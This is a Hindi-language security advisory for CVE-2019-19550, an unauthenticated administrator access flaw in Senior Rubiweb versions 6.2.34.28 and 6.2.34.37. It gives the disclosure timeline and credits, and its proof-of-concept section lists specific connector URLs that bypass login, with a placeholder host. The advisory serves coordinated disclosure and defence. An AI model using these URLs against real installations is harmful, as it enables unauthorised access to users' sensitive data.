CVE-2019-19550
[विवरण]
Senior Rubiweb 6.2.34.28 और 6.2.34.37 में दूरस्थ प्रमाणीकरण बायपास, कमजोर संस्करणों का उपयोग करने वाले प्रभावित उपयोगकर्ताओं की संवेदनशील जानकारी तक व्यवस्थापक पहुंच की अनुमति देता है। हमलावर को केवल सही URL प्रदान करने की आवश्यकता होती है।
[महत्वपूर्ण तिथियाँ]
- घोषणा (विक्रेता को): 2019-12-02
- सार्वजनिक प्रकटीकरण तिथि: 2020-01-30
[भेद्यता प्रकार]
गलत अभिगम नियंत्रण
[उत्पाद का विक्रेता]
Senior
[प्रभावित उत्पाद कोड बेस]
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- अन्य संस्करण प्रभावित हो सकते हैं, विशेष रूप से समान परिवार में (अभी तक परीक्षण नहीं किया गया)
[प्रभावित घटक]
Rubiweb
[हमले का प्रकार]
दूरस्थ
[प्रभाव: सूचना प्रकटीकरण]
हाँ
[हमले के वेक्टर]
संवेदनशील जानकारी तक पहुंच बिना किसी विशेष आवश्यकता के सार्वजनिक रूप से उपलब्ध है (केवल सही URI)
[क्या विक्रेता ने भेद्यता की पुष्टि या स्वीकृति दी है?]
हाँ
[PoC - प्रमाण की अवधारणा]
- प्रभावित उत्पाद के अस्तित्व और संस्करण की पुष्टि करने के लिए केवल प्रमाणित पोर्टल से कनेक्ट करने का प्रयास करें:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- कमजोर पृष्ठ तक पहुंचें (बिना प्रमाणीकरण के व्यवस्थापक):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
[खोजकर्ता]
Mauricio Santos (R&D UnderProtection) और Hesron Hori (R&D UnderProtection)
[धन्यवाद]
Senior - विक्रेता की सूचना सुरक्षा टीम जिसने समन्वित प्रकटीकरण में सहयोग किया
[संदर्भ]